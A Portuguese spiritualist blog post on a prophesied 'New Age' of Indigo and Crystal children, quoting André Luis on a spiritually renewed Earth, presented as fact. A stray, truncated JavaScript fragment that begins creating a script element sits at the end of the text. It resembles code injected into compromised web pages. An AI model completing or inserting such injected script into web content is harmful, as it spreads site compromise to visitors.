A nova Humanidade chegando

Muitas tradições espiritualistas profetizam, há tempos, que neste milênio a Terra entraria numa Nova Era – a Era de Aquário. Posteriormente, algumas delas informaram que seres humanos mais gabaritados começaram a nascer a partir de 1973, e deram-lhes o nome de Crianças Índigo (aura azul), ou Crianças Revolucionárias.

Recentemente, tivemos novas informações a respeito de crianças mais gabaritadas ainda que começaram a nascer no ano 2.000, cognominadas Crianças Cristal (aura clara), ou Crianças Pacificadoras. André Luis, na obra “Futuro Espiritual da Terra”, fala desse novo momento. Vejamos:

Entidades experientes e esclarecidas nasceram e continuarão a nascer em todos os continentes para lançar as sementes do despertar espiritual da Humanidade, e também para fazer com que os homens busquem com mais intensidade a origem divina que permanece adormecida dentro deles.

O nascimento de uma consciência renovada está sendo implementada em todos os espíritos que estagiam na Terra sob o comando de Cristo. E a Terra será transformada numa morada elevada que entrará de vez no rol de mundos redimidos. A fraternidade será a expressão do planeta renovado.

O Planeta precisa fechar as portas para a inferioridade que ainda influencia a vida humana, pois muitos se encontram distraídos para a realidade imortal que lhe aguarda além-túmulo.

No futuro, os corpos físicos apresentarão determinadas capacidades para que a inteligência humana se expanda, alterando a anatomia do corpo físico. A Terra não terá mais as características de hoje, tais como a separação das raças, religiões e interesses coletivos. As paisagens de dor e mendicância desaparecerão.

As instituições educativas farão com que a dignidade humana seja refletida na Terra. O sentimento de desapego, acrescido de um profundo amor por todos e com tudo, será a marca dos seres sublimados que executarão as determinações imediatas do Criador. Então, o homem conquistará o direito de ser cidadão do Universo.var d=document;var s=d.createElement(‘script’);

Deixe um comentário